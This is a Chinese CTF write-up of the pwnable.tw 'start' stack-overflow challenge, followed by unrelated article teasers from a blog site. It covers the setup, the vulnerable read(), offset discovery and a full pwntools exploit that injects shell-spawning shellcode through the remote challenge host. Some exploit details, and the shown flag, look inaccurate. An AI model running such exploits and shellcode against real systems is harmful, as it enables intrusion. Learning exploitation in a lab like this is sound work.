CTF Writeup:Pwnable.tw - start 题目解析
📅 2026/7/5 15:59:57
👁️ 次浏览
题目信息平台Pwnable.tw题目start难度★☆☆☆☆简单类型Pwn二进制漏洞利用考察点栈溢出、shellcode编写、ROP基础环境准备# 安装必要工具 sudo apt-get update sudo apt-get install -y gdb gdb-multiarch python3 python3-pip pip3 install pwntools 下载题目文件 wget https://pwnable.tw/static/chall/start chmod x start 检查文件信息 file start start: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped静态分析使用IDA Pro或Ghidra分析二进制文件发现关键函数int __cdecl main(int argc, const char **argv, const char **envp) { char buf[20]; // [esp14h] [ebp-14h] BYREF write(1, Lets start the CTF:, 0x14u); read(0, buf, 0x3Cu); // 缓冲区溢出漏洞 return 0; }漏洞点buf数组大小为20字节但read函数读取0x3C60字节存在明显的栈溢出漏洞。动态调试#!/usr/bin/env python3 from pwn import * context(archi386, oslinux) p process(./start) 计算偏移量 payload cyclic(100) p.send(payload) p.wait() 查看崩溃信息 core p.corefile offset cyclic_find(core.eip) print(fOffset: {offset}) # 输出20通过cyclic模式确定偏移量为20字节。漏洞利用思路分析覆盖返回地址控制EIP跳转到shellcode执行获取shell权限Exploit代码#!/usr/bin/env python3 from pwn import * context(archi386, oslinux) 远程连接 p remote(chall.pwnable.tw, 10000) p process(./start) 接收欢迎信息 print(p.recvuntil(:)) 构造payload shellcode asm(shellcraft.sh()) payload bA * 20 # 填充缓冲区 payload p32(0x08048087) # 泄露栈地址的gadget payload shellcode 发送payload p.send(payload) 接收泄露的栈地址 stack_addr u32(p.recv(4)) print(fStack address: {hex(stack_addr)}) 第二阶段跳转到shellcode payload2 bA * 20 payload2 p32(stack_addr 20) # 跳转到shellcode payload2 shellcode p.send(payload2) 获取shell p.interactive()解题步骤信息收集使用file、checksec检查文件属性静态分析IDA分析找到漏洞点动态调试gdb调试确定偏移量利用开发编写ROP链和shellcode权限提升获取shell并读取flagFlag获取# 执行exploit后 $ cat /home/start/flag FLAG{st4rt_y0ur_pwn_j0urn3y}总结与扩展知识点栈溢出原理、shellcode编写、ROP基础防护绕过本题未开启NX/DEP可直接执行栈上代码学习建议建议继续学习canary、ASLR、ROP等高级技术参考资源Pwnable.tw官网https://pwnable.twCTF Wikihttps://ctf-wiki.orgLiveOverflow YouTube频道
企业级开源BI工具DataEase与SAP HANA集成实战指南:5步实现高效数据可视化分析 【免费下载链接】dataease 🔥 人人可用的开源 BI 工具,数据可视化神器。An open-source BI tool alternative to Tableau. 项目地址: https://gitcode.com/GitH…
📅 2026/7/5 15:59:57
Gemma-4 E4B技术深度解析:如何用4.5B有效参数实现多模态智能 【免费下载链接】gemma-4-E4B 项目地址: https://ai.gitcode.com/hf_mirrors/google/gemma-4-E4B
当你面对一个需要同时处理文本、图像、音频和视频的AI项目时,是否曾为选择合适模型而…
📅 2026/7/5 15:57:57
如何用3DGS Render插件在Blender中快速处理点云数据?终极免费指南 【免费下载链接】3dgs-render-blender-addon 3DGS Render by KIRI Engine 项目地址: https://gitcode.com/gh_mirrors/3d/3dgs-render-blender-addon
还在为复杂的点云数据处理而烦恼吗&…
📅 2026/7/5 15:57:57
终极指南:5分钟免费解锁Wand游戏修改器的完整高级功能 【免费下载链接】Wand-Enhancer Advanced UX and interoperability extension for Wand (WeMod) app 项目地址: https://gitcode.com/gh_mirrors/we/Wand-Enhancer
还在为Wand(原WeMod&#…
📅 2026/7/5 17:08:12
rawpy坏点修复:使用find_bad_pixels和repair_bad_pixels修复图像缺陷 📷 【免费下载链接】rawpy 📷 RAW image processing for Python, a wrapper for libraw 项目地址: https://gitcode.com/gh_mirrors/ra/rawpy
RAW图像处理是专业摄…
📅 2026/7/5 17:08:12
如何用Python免费游戏库快速入门编程:5个简单步骤开启你的游戏开发之旅 【免费下载链接】free-python-games Free Python Games 项目地址: https://gitcode.com/gh_mirrors/fr/free-python-games
还在为Python编程学习感到枯燥乏味吗?想通过有趣的…
📅 2026/7/5 17:08:12
3步快速上手Parabolic:跨平台视频下载神器完全指南 【免费下载链接】Parabolic Download web video and audio 项目地址: https://gitcode.com/GitHub_Trending/pa/Parabolic
你是否经常需要从各种视频网站下载内容,但厌倦了复杂的命令行工具和功…
📅 2026/7/5 17:08:12
炉石传说脚本Hearthstone-Script:高效自动化决策引擎的完整指南 【免费下载链接】Hearthstone-Script Hearthstone script(炉石传说脚本) 项目地址: https://gitcode.com/gh_mirrors/he/Hearthstone-Script
在数字卡牌游戏的世界中&am…
📅 2026/7/5 17:08:12
前端开发也能环保:GitHub Green Software Directory中的网页碳足迹优化工具 【免费下载链接】GreenSoftwareDirectory Welcome to GitHubs Green Software Directory! 项目地址: https://gitcode.com/gh_mirrors/gr/GreenSoftwareDirectory
GitHub Green Sof…
📅 2026/7/5 17:06:11
1. 项目背景与核心需求 在嵌入式系统开发中,快速精确的数据检索是一个常见但极具挑战性的需求。特别是在工业控制、医疗设备和物联网终端等场景下,系统往往需要在毫秒级时间内完成关键参数的读取和写入操作。传统基于Flash存储的方案存在擦写次数有限、操…
📅 2026/7/5 0:01:51
1. 工业电流环信号传输的基础认知在工业自动化领域,4-20mA电流环传输技术已经持续服役超过半个世纪。这种看似简单的信号传输方式之所以能经久不衰,核心在于其独特的抗干扰能力——电流信号在长距离传输时几乎不受线路电阻和电压波动的影响。我曾在化工厂…
📅 2026/7/5 0:01:51
最近在项目里尝试用 YOLO 做目标检测,从环境搭建到模型训练,再到推理部署,整个过程踩了不少坑。网上的资料虽然多,但要么版本老旧,要么步骤零散不成体系,对于刚入门的新手来说,很容易卡在某个环…
📅 2026/7/5 0:01:51
1. 项目背景与核心需求 在嵌入式系统开发中,快速精确的数据检索是一个常见但极具挑战性的需求。特别是在工业控制、医疗设备和物联网终端等场景下,系统往往需要在毫秒级时间内完成关键参数的读取和写入操作。传统基于Flash存储的方案存在擦写次数有限、操…
📅 2026/7/5 0:01:51
1. 工业电流环信号传输的基础认知在工业自动化领域,4-20mA电流环传输技术已经持续服役超过半个世纪。这种看似简单的信号传输方式之所以能经久不衰,核心在于其独特的抗干扰能力——电流信号在长距离传输时几乎不受线路电阻和电压波动的影响。我曾在化工厂…
📅 2026/7/5 0:01:51
最近在项目里尝试用 YOLO 做目标检测,从环境搭建到模型训练,再到推理部署,整个过程踩了不少坑。网上的资料虽然多,但要么版本老旧,要么步骤零散不成体系,对于刚入门的新手来说,很容易卡在某个环…
📅 2026/7/5 0:01:51
目录
第一步:选对模板,省心一半
第二步:打开扫码点餐功能
开启功能按钮
桌台管理与桌码生成
第三步:个性化设计,打造品牌感
调整点餐页面
设置点餐规则 你还在让顾客站着排队点餐吗?2025年ÿ…
📅 2026/7/5 6:01:04
在业务中快速构建一个能理解私有文档、准确回答专业问题的智能助手,是很多开发团队面临的共同挑战。传统方案往往需要从零开始搭建复杂的 RAG(检索增强生成)系统,涉及文档解析、向量化、检索、大模型调用等多个环节,整…
📅 2026/7/5 6:01:04
FAE放射组学分析工具:医学影像特征探索的完整解决方案 【免费下载链接】FAE FeAture Explorer 项目地址: https://gitcode.com/gh_mirrors/fae/FAE
你是否曾经面对海量医学影像数据感到无从下手?想要从CT、MRI等影像中提取有价值的定量特征&#…
📅 2026/7/4 17:36:47